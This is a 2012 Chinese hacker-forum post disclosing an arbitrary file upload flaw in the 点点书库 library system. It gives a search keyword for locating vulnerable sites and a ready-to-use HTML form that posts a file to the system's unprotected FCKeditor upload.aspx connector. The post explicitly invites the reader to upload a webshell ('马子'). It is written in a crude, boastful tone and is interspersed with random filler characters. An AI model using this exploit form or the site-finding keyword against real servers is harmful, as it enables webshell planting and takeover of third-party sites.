主题:图书馆系统任意文件上传漏洞) R# B, D# {4 \0 k
作者:冰锋刺客( V0 r9 C8 Z6 y5 s& ?, }
厂商:点击书(dianjishu.com)" a9 x: p$ z$ s: _* M$ P
日期:2012-6-21& a- y, ~0 _5 ?, I
k' D; t+ E6 \2 ]4 _+ O' i
I 概述. @, ?# z4 v% o
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
: U# m9 R. Y5 ^ {1 N II 简介6 v6 x! S+ e$ A6 P
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"& u: d; ~* R" S1 H2 ]; w1 C
补充一个漏洞: x% \ P8 n1 P- I9 i7 F
<form id="frmUpload" enctype="multipart/form-data"
) f& S+ _: x! _8 F% y- x+ @ action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
; V3 F# Q5 B9 _. q% |3 O <input id="btnUpload" type="submit" value="操翻他">
" N" P! y/ S$ S& g. w r2 X </form>! i* |. V s) j% ?5 B
你们懂的0 \3 t# @" s* |( ^3 r7 S5 x3 u: O
那傻逼提供还需要改包.
+ V* ] h/ T& I5 X0 W% y5 l 自己看了下源代码发现fckeditor
6 v& E+ }0 p: N, Q2 Y/ y: U 直接秒杀; B8 L- E1 _$ u( i% T3 c& O. s
|